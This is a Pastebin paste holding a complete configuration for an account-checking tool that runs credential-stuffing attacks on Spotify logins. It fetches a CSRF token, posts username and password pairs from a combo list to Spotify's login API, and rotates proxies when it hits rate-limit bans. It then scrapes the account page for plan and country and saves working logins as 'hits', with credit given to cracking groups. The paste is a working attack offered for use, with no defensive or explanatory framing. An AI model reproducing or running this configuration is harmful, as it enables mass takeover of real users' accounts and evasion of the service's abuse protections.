Advertisement
Guest User

Untitled

a guest
Sep 26th, 2018
28,787
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.33 KB | None | 0 0
  1. [General]
  2. UseProxy = True
  3. UseGlobalKeywords = True
  4. DefaultTimeout = 10
  5. UnbanAllProxiesWhenAllBannedAfter = 0.1
  6. HitsFolderName = Spotify
  7.  
  8. [Stage-1]
  9. Condition = Any
  10. Variable-1 = $Link1 = "https://accounts.spotify.com/en/login?continue=https:%2F%2Fwww.spotify.com%2Fint%2Faccount%2Foverview%2F"
  11. Link = $Link1#
  12. isFTP = False
  13. HTTPVersion = 1.1
  14. FollowRedirect = False
  15. HTTPRequestMethod = GET
  16. Timeout = 10
  17. Variable-2 = $Heads1 = "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8"
  18. Headers = $Heads1#
  19. Variable-3 = $CSRF = findtagval($Stage1ResponseHeader#, "csrf_token=", ";")
  20. Ban-Condition = indexof($Stage1ResponseHeader#, "Vary: Accept-Encoding") < 0
  21.  
  22. [Stage-2]
  23. Condition = Any
  24. Variable-1 = $Link2 = "https://accounts.spotify.com/api/login"
  25. Link = $Link2#
  26. isFTP = False
  27. HTTPVersion = 1.1
  28. FollowRedirect = False
  29. HTTPRequestMethod = POST
  30. Timeout = 10
  31. Variable-2 = $Heads2 = combinetext("Accept: application/json, text/plain, */*\nPragma: no-cache\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)\nReferer: https://accounts.spotify.com/en/login?continue=https:%2F%2Fwww.spotify.com%2Fint%2Faccount%2Foverview%2F\nCookie: remember=", $ComboUsername#, "; csrf_token=", $CSRF#, "; Version=1; sp_t=86cef17a7242afcac4f21114c4ff8844; __tumi=c46b66466249a48d2a7d; __tdev=o0rPEL8N; __tvis=CqEANE9V; spot=%7B%22t%22%3A1495557732%2C%22m%22%3A%22de%22%2C%22p%22%3A%22premium%22%7D; __bon=MHwwfC0yMDM1NTQ0NDQ5fC04NTQ5Mjg2Njg1OHwxfDF8MXwx; fb_continue=https%3A%2F%2Fwww.spotify.com%2Fde%2Faccount%2Foverview%2F; _ga=GA1.2.1020018000.1492713823; _gid=GA1.2.759083564.1495557733; _gat=1")
  32. Headers = $Heads2#
  33. Variable-3 = $PostContent = combinetext("username=", $ComboUsername#, "&password=", $ComboPassword#, "&remember=true&csrf_token=", $CSRF#)
  34. PostContent = $PostContent#
  35. Variable-4 = $IndexOfFailKey1 = indexof($Stage2ResponseSource#, "errorInvalidCredentials")
  36. Variable-5 = $IndexOfFailKey2 = indexof($Stage2ResponseSource#, "errorUnknown")
  37. Variable-6 = $IndexOfFailKey3 = indexof($Stage2ResponseSource#, "server_error")
  38. Failure-Condition = $IndexOfFailKey1# >= 0 || $IndexOfFailKey2# >= 0 || $IndexOfFailKey3# >= 0
  39. Ban-Condition = indexof($Stage2ResponseHeader#, "429 Too Many Requests") >= 0
  40.  
  41. [Stage-3]
  42. Condition = Any
  43. Variable-1 = $Link3 = "https://www.spotify.com/us/account/overview/"
  44. Link = $Link3#
  45. isFTP = False
  46. HTTPVersion = 1.1
  47. FollowRedirect = False
  48. HTTPRequestMethod = GET
  49. Timeout = 10
  50. Variable-2 = $Heads3 = "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\nReferer: https://accounts.spotify.com/en-US/login?continue=https:%2F%2Fwww.spotify.com%2Fde%2Faccount%2Foverview%2F"
  51. Headers = $Heads3#
  52. Variable-3 = $IndexOfSuccKey1 = indexof($Stage3ResponseSource#, "label': 'premium")
  53. Variable-4 = $IndexOfSuccKey2 = indexof($Stage3ResponseSource#, "label': 'family-plan")
  54. Variable-5 = $IndexOfSuccKey3 = indexof($Stage3ResponseSource#, "label': 'cancel-recurring")
  55. Variable-6 = $IndexOfSuccKey4 = indexof($Stage3ResponseSource#, "btn-manage-familyplan")
  56. Variable-7 = $IndexOfSuccKey5 = indexof($Stage3ResponseSource#, "label': 'non-recurring")
  57. Variable-8 = $IndexOfSuccKey6 = indexof($Stage3ResponseSource#, "label': 'payment-failure")
  58. Variable-9 = $IndexOfSuccKey7 = indexof($Stage3ResponseSource#, "label': 'bundle")
  59. Variable-10 = $IndexOfSuccKey8 = indexof($Stage3ResponseSource#, "Student")
  60. Variable-11 = $IndexOfFreeKey1 = indexof($Stage3ResponseSource#, "label': 'upsell-trial_30_days")
  61. Variable-12 = $IndexOfFreeKey2 = indexof($Stage3ResponseSource#, "label': 'free")
  62. Variable-13 = $IndexOfFreeKey3 = indexof($Stage3ResponseSource#, "label': 'payment-locked-state")
  63. Variable-14 = $Plan = if($IndexOfSuccKey1# >= 0 || $IndexOfSuccKey3# >= 0 || $IndexOfSuccKey5# >= 0 || $IndexOfSuccKey6# >= 0, findtagval($Stage3ResponseSource#, "checkmarkchr(double quotes)></use></svg></span>", "</h3>"), findtagval($Stage3ResponseSource#, "product-namechr(double quotes)>", "</h3>"))
  64. Variable-15 = $Country = findtagval($Stage3ResponseSource#, "userCountry': '", "'")
  65. Variable-16 = $SaveFormat = combinetext($ComboUsername#, ":", $ComboPassword#, "\nPlan: ", if($IndexOfSuccKey7# >= 0, $Plan#, if($IndexOfSuccKey8# >= 0, "Premium for Students", if($IndexOfFreeKey3# >= 0, "Premium Paused", if($IndexOfSuccKey4# >= 0, "Family Owner", $Plan#)))), "\nCountry: ", uppercase($Country#), "\nCredit: Polaron, TopAccGen & AntiLeech")
  66. Success-Condition = $IndexOfSuccKey1# >= 0 || $IndexOfSuccKey2# >= 0 || $IndexOfSuccKey3# >= 0 || $IndexOfSuccKey5# >= 0 || $IndexOfSuccKey6# >= 0 || $IndexOfSuccKey7# >= 0
  67. Free-Condition = $IndexOfFreeKey1# >= 0 || $IndexOfFreeKey2# >= 0 || $IndexOfFreeKey3# >= 0
  68. Ban-Condition = indexof($Stage3ResponseHeader#, "404 Not Found") >= 0 || indexof($Stage3ResponseHeader#, "302 Found") >= 0 || indexof($Stage3ResponseHeader#, "Internal Server Error") >= 0 || indexof($Stage3ResponseSource#, "Your network access from this device is currently suspended.") >= 0
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement